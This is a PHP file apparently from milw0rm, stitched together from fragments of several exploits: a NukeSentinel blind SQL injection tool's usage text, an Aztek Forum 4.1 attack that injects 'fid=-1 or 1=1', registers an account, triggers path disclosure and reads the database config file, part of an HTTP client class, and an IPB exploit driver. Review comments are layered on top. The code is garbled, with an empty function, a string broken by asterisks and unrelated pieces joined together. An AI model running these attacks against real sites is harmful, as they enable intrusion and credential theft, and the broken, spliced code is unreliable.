<?php 
// Command-line entry point. Needs at least a "-url <value>" pair on the
// command line; otherwise the usage text is printed and the script exits
// with status 1.
// NOTE(review): E_NOTICE is masked for the whole run, so undefined
// indexes/variables further down (e.g. an option that was not given) go
// unreported instead of surfacing as warnings.
error_reporting(E_ALL ^ E_NOTICE);
if ($argc < 3) {
    // {$argv['0']} interpolates $argv[0] (PHP casts the numeric-string key
    // to int), i.e. the script's own name.
    print "\n--  NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit  ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n       Credits: DarkFig <*****@*****.**>\n           URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n  Usage: {$argv['0']} -url <> [Options]\n Params: -url       For example http://victim.com/phpnuke/ \nOptions: -prefix    Table prefix (default=nuke)\n         -debug     Debug mod activated (debug_ns.html)\n         -truetime  Server response time which returns true\n         -benchmark You can change the value used in benchmark()\n         -proxy     If you wanna use a proxy <proxyhost:proxyport> \n         -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n   Note: This exploit is based on the server response time\n         If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
    exit(1);
}
// Option parsing goes through getparam(), defined elsewhere in the file
// (not visible here). The second argument on the "url" lookup presumably
// marks the option as mandatory — confirm against getparam().
$url = getparam("url", 1);
// Each optional value is looked up twice (once for the test, once for the
// value); the default table prefix is 'nuke'.
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
// -debug is a presence flag: any non-empty value switches it on.
$debug = getparam("debug") != "" ? 1 : 0;
// Default is kept as a string, not an int; it is the value the usage text
// says is fed to the timing probe.
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
// HTTP client (phpsploit class, defined elsewhere in the file). The three
// calls below set the User-Agent and, judging by the property names the
// class's reset() method clears, presumably turn redirect-following and the
// cookie jar off — confirm against the class.
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
// debug() is a free function here (not a method of $xpl); per the usage
// text it is expected to write debug_ns.html — not verifiable from this view.
if ($debug) {
    debug(1);
}
// NOTE(review): this line is not valid PHP as shown — the hosting site appears
// to have replaced part of the original string literal with "******". Left
// byte-for-byte; the original file presumably printed a username here.
print "\nUsername: "******"\nPassword: ";
// bruteforce() is defined further down (its body is outside this excerpt).
// Per the usage text its result depends on server response time, so from the
// defender's side the observable pattern is a burst of near-identical
// requests to one endpoint with widely varying latency, rather than any
// single distinctive request.
bruteforce('pwd');
exit(0);
function bruteforce($field)
// $prs / $pra (proxy host:port and proxy credentials) and $xpl / $url are
// assigned earlier in the file, outside this excerpt.
// NOTE(review): empty() also treats the string "0" as empty, so such a value
// would silently skip the proxy setup.
if (!empty($prs)) {
    $xpl->proxy($prs);
}
if (!empty($pra)) {
    $xpl->proxyauth($pra);
}
print "\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
// First request: the forum "owner" value is read back out of the response
// with a regex; if the response does not contain it the script stops here,
// so $matches[1] is guaranteed to exist on the line after the else branch.
// Defender's note: the fid parameter in this request is not a numeric id —
// input validation / parameterised queries on fid would make the response
// indistinguishable from a normal "not found".
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
    print "\nsploit> Owner -> " . $matches[1];
} else {
    die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
// Cookie jar and redirect-following are switched on (presumably; the class
// is not in view) before the registration POST so the session survives.
$xpl->cookiejar(1);
$xpl->allowredirection(1);
// Throwaway account name; rand() is adequate here since the name is not a
// secret, it only needs to be unlikely to collide.
$name = "phpsploit" . rand();
$xpl->post($url . "index.php?owner={$owner}&action=subscribe", "login={$name}&passwd={$name}&passwd2={$name}&email={$name}%40hotmail.coum&show_email=on&cookie=on");
print "\nsploit> Login/Password -> {$name}";
print "\nstatus> Trying to get database informations";
// A non-numeric fid makes the application emit a PHP error message that
// contains the script's absolute path on disk; the regex pulls that path out.
// Mitigation on the server side is simply not echoing error output to the
// client (display_errors off, log errors instead).
// getcontent() with no argument presumably returns the last response body —
// confirm against the class.
$xpl->get($url . "forum.php?fid=XD");
if (preg_match("#file (.*) in function#i", $xpl->getcontent(), $matches)) {
    print "\nsploit> Full Path Disclosure -> " . $matches[1];
} else {
    print "\nsploit> Failed";
}
// NOTE(review): if the preg_match above failed, $matches is left empty, so
// $matches[1] is undefined (null) here; str_replace() then yields "" and the
// !empty($wanted) guard that follows skips the next step. That works only
// by accident (and emits a notice / a null-argument deprecation on PHP 8.1+);
// the intent would be clearer as an early exit in the else branch above.
$wanted = str_replace("forum/load.php", "common/bddconf.php", $matches[1]);
if (!empty($wanted)) {
    $xpl->get($url . "index.php?owner={$owner}&action=profile&_SERVER[email]={$name}%40hotmail.coum&_FILES[upload][tmp_name]={$wanted}&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg");
    $xpl->get($url . "index.php?owner={$owner}&choix=3");
     * @example $this->reset()
     * 
     */
    function reset($func = '')
    {
        // Loose (==) comparison is kept deliberately to mirror the switch()
        // semantics this replaces; 'header' and 'cookie' clear one list each,
        // anything else clears all stored request state.
        if ($func == 'header') {
            $this->header = array();
            return;
        }
        if ($func == 'cookie') {
            $this->cookie = array();
            return;
        }
        $this->cookiejar = '';
        $this->header = array();
        $this->cookie = array();
        $this->allowredirection = '';
    }
}
// Script body: builds the HTTP client (phpsploit, defined above) and hands
// it to the ipb_spl driver object (defined elsewhere in the file), then
// runs it.
$web = new phpsploit();
// Presumably enables the cookie jar so the session persists across
// requests — confirm against the class.
$web->cookiejar(1);
$web->agent('Mozilla Firefox');
$ipb = new ipb_spl();
// Assigned by reference, so $ipb->web and $web are the same object handle
// even on pre-PHP-5 object semantics; with PHP 5+ objects a plain "=" would
// behave the same.
$ipb->web =& $web;
// main() is not in view; everything after this point is driven by ipb_spl.
$ipb->main();
?>

# milw0rm.com [2008-08-29]